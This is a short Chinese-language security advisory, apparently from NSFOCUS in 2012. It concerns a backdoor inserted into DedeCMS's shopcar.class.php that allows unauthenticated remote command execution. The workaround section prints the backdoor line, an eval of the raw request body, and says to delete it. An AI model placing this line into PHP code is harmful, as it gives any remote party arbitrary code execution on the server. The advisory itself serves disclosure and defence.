织梦CMS后门远程代码执行漏洞


发布日期:2012-03-21
更新日期:2012-03-22

受影响系统:
dedecms dedecms 2.0
描述:
--------------------------------------------------------------------------------
DEDECMS是织梦内容管理系统,国内一款基于PHP+MySQL的技术开发的,支持多种服务器平台的PHP网站内容管理系统。

DedeCMS某些版本/include/shopcar.class.php文件中,被添加后门代码,远程未验证的攻击者利用该后门可以执行任意命令。

<*来源:jsbug
 
  链接:http://www.wooyun.org/bugs/wooyun-2010-05416
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*直接找到站点include目录下shopcar.class.php文件,去掉里面的代码
@eval(file_get_contents('php://input'));即可。

厂商补丁:

dedecms
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dedecms.com/products/dedecms/

相关内容

    暂无相关文章